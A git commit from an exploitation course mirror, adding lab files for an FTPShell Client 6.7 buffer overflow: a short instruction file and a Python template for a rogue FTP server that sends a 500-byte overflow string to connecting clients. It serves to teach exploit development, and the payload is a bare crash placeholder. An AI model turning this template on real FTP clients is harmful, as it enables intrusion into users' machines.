mirror of
https://github.com/ashemery/exploitation-course
synced 2024-06-28 09:53:44 +00:00
Lab_04 files
This commit is contained in:
parent
80ecb6b49b
commit
8ce998062c
6
labs/lab_04/Lab_04.txt
Normal file
6
labs/lab_04/Lab_04.txt
Normal file
@ -0,0 +1,6 @@
|
||||
FTPShell Client 6.7 Buffer Overflow
|
||||
|
||||
Please check the URL for the vulnerable application.
|
||||
https://www.exploit-db.com/exploits/44596
|
||||
|
||||
The exploit.py file is to be used as a your exploit template.
|
28
labs/lab_04/exploit.py
Normal file
28
labs/lab_04/exploit.py
Normal file
@ -0,0 +1,28 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
import socket
|
||||
import sys
|
||||
|
||||
# https://www.exploit-db.com/exploits/44596
|
||||
|
||||
port = 21
|
||||
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
|
||||
s.bind(("0.0.0.0", port))
|
||||
s.listen(5)
|
||||
print("[+] FTP server listening on port: "+str(port)+"\r\n")
|
||||
except:
|
||||
print("[x] Failed to start the FTP server on port: "+str(port)+"\r\n")
|
||||
|
||||
payload = "A" * 500
|
||||
|
||||
while True:
|
||||
conn, addr = s.accept()
|
||||
conn.send('220 FTP Server\r\n')
|
||||
print(conn.recv(1024))
|
||||
conn.send("331 OK\r\n")
|
||||
print(conn.recv(1024))
|
||||
conn.send('230 OK\r\n')
|
||||
print(conn.recv(1024))
|
||||
conn.send('220 "'+ payload +'" is current directory\r\n')
|
Loading…
Reference in New Issue
Block a user